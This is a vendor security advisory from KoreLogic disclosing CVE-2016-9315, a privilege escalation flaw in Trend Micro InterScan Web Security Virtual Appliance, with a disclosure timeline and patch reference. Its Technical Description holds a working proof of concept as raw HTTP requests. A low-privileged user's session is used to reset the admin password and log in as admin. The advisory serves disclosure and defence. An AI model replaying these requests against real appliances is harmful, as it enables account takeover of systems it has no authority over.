KL-001-2017-002 : Trendmicro InterScan Privilege Escalation Vulnerability
Title: Trendmicro InterScan Privilege Escalation Vulnerability
Advisory ID: KL-001-2017-002
Publication Date: 2017.02.15
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-002.txt
1. Vulnerability Details
Affected Vendor: Trendmicro
Affected Product: InterScan Web Security Virtual Appliance
Affected Version: OS Version 3.5.1321.el6.x86_64; Application
Version 6.5-SP2_Build_Linux_1548
Platform: Embedded Linux
CWE Classification: CWE-269: Improper Privilege Management
Impact: Privilege Escalation
Attack vector: HTTP
CVE-ID: CVE-2016-9315
2. Vulnerability Description
Any authenticated user can execute administrative functionality
3. Technical Description
1. Login as least privileged user role.
POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://1.3.3.8:8443/logon.jsp
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
wherefrom=&wronglogon=no&uid=reports&passwd=reports&pwd=Log+On
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location:
https://1.3.3.8:8443/index.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:02:24 GMT
Connection: close
2. Use session identifier to run administrator functionality to change
admin password.
POST /servlet/com.trend.iwss.gui.servlet.updateaccountadministration HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://1.3.3.8:8443/login_account_add_modify.jsp?CSRFGuardToken=9RN5D8EPS3MS4R5BCQMR3KE4SHPVCMZV&op=review&uid=admin
Cookie: JSESSIONID=FA0756E428016DE2FCABF4DF1A91D8A9
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 280
CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK&accountop=review&allaccount=admin&allaccount=auditor&allaccount=reports&accountname=admin&commonname=admin&accounttype=0&password_changed=true&PASS1=korelogic2&PASS2=korelogic2&description=Master+Administrator&role_select=0&roleid=0
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Location:
https://1.3.3.8:8443/login_accounts.jsp?CSRFGuardToken=N260J66MTV0BA0DP7V2MG4WA1XXXGOZK
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:37 GMT
Connection: close
3. Login as admin
POST /uilogonsubmit.jsp HTTP/1.1
Host: 1.3.3.8:8443
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:49.0)
Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://1.3.3.8:8443/logout.jsp?CSRFGuardToken=VS0DHVK4Q9T7GJF0N08812Y5FNTNT67M
Cookie: JSESSIONID=6903A112B76F642A05573990BB3057DB
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
uid=admin&passwd=korelogic2
HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache
Location:
https://1.3.3.8:8443/index.jsp?CSRFGuardToken=IDVSTBAEVTSQOP6GJWZI3BDZZVBKAYW4&summary_scan
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Tue, 25 Oct 2016 15:03:54 GMT
Connection: close
4. Mitigation and Remediation Recommendation
The vendor has issued a patch for this vulnerability in Version
6.5 CP 1737. Security advisory and link to the patched version
available at:
https://success.trendmicro.com/solution/1116672
5. Credit
This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.
6. Disclosure Timeline
2016.12.12 - KoreLogic sends vulnerability report and PoC to
Trendmicro.
2016.12.12 - Trendmicro acknowledges receipt of report.
2017.01.11 - Trendmicro informs KoreLogic that the patch to
this and other KoreLogic reported issues will
likely be available after the 45 business day
deadline (2017.02.16).
2017.02.06 - Trendmicro informs KoreLogic that the patched
version will be available by 2017.02.14.
2017.02.14 - Trendmicro security advisory released.
2017.02.15 - KoreLogic public disclosure.
7. Proof of Concept
See 3. Technical Description.
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt